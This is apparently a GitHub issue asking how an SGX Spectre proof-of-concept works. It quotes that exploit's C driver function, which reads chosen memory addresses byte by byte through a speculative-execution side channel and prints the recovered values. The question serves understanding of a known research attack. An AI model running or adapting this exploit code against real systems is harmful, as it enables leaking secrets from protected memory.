Working mechanism of sgx spectre attack #3

Open
buttercutter opened this issue Apr 16, 2020 · 0 comments

Could anyone explain the working mechanism of the SGX Spectre attack?

How is the `ecall_get_offset()` caching function actually used in this SGX Spectre exploit?

```c
int spectre_main(int argc, char **argv) {
	size_t malicious_x;
	sgx_status_t ret = ecall_get_offset(global_eid, &malicious_x); /* default for malicious_x */
	if (ret != SGX_SUCCESS)
		abort();

	int i, score[2], len = 40;
	uint8_t value[2];

	for (i = 0; i < sizeof(array2); i++)
		array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */

	/* Optional overrides: argv[1] = address to read, argv[2] = number of bytes */
	if (argc == 3) {
		sscanf(argv[1], "%p", (void**)(&malicious_x));
		malicious_x -= (size_t)array1dupe; /* Convert input value into a pointer */
		sscanf(argv[2], "%d", &len);
	}

	printf("Reading %d bytes:\n", len);

	while (--len >= 0) {
		printf("Reading at malicious_x = %p... ", (void*)malicious_x);
		readMemoryByte(malicious_x++, value, score);
		/* "Success" when the best score is at least twice the runner-up */
		printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear"));
		printf("0x%02X='%c' score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
		if (score[1] > 0)
			printf("(second best: 0x%02X score=%d)", value[1], score[1]);
		printf("\n");
	}

	return (0);
}
```